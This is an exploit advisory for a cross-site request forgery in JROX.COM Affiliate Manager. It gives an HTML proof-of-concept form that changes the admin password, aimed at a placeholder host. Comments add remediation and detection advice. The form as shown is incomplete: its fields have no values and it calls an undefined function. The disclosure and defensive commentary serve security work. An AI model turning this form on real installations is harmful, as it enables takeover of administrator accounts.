# Exploit Title: JROX.COM Affiliate Manager CBFront CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/jroxcom-affiliate-manager/20262/
# Category:: webapps
# Demo : http://www.jroxdemo.com/jamdemo162/admin/index.php
<!--
  Proof-of-concept form for the cross-site request forgery named in the title.
  It issues a POST to the admin settings handler (mod=settings, req=admin,
  action=edit, aid=1) carrying only "password" and "confirm_password".
  "target.com/[PATH]" is a placeholder for the installation under test.

  What the form shows about the request:
    * No anti-CSRF token field is present.
    * No current-password field is present.
  If the server accepts this request as shown (the advisory's claim; not
  verifiable from this page), an authenticated admin session alone is enough
  to authorise the password change. aid=1 is presumably the id of the admin
  account being edited; confirm against the application.

  Remediation on the application side:
    * Require a per-session or per-request anti-CSRF token on every
      state-changing admin action and validate it server-side.
    * Require the current password (re-authentication) before accepting a new one.
    * Set the session cookie with a SameSite attribute and validate
      Origin/Referer on admin POSTs as defence in depth.

  Detection: review web logs for POSTs to admin/main.php with
  mod=settings&req=admin&action=edit whose Origin or Referer is not the
  application's own host, and correlate with unexpected admin password changes.
-->
<!-- onsubmit calls CheckData(), which is not defined anywhere on this page. -->
<form id="form1" name="form1" method="post" action="target.com/[PATH]/admin/main.php?mod=settings&req=admin&action=edit&aid=1" style="display:inline;" onsubmit="return CheckData();">
<input type="submit" class="select_small_1" value="Change" name="Submit"/>
<!-- Both password fields are hidden and carry no value attribute in this listing. -->
<input type="hidden" style="display: inline;" id="password" maxlength="30" size="30" name="password"/>
<input type="hidden" style="display: inline;" id="confirm_password" maxlength="30" size="30" name="confirm_password"/>
</form>